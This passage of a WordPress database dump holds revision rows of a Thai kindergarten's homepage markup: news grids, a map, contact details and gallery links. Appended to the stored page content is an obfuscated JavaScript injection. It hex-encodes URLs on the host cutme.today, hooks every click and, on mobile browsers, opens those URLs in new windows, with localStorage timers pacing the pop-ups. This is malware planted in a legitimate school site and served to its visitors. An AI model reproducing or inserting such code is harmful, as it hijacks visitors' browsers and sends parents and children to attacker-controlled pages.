900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:03:47','2024-07-27 14:03:47','',19,'http://watprato.ssk.in.th/?p=54',0,'revision','',0),
(58,1,'2024-07-27 21:07:44','2024-07-27 14:07:44','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"bcb37a0b\",\"mediaId\":40,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bcb37a0b\"><img class=\"gb-image gb-image-bcb37a0b\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434878811_122134783502202781_1764078122862278595_n.jpg\" alt=\"\" title=\"434878811_122134783502202781_1764078122862278595_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid 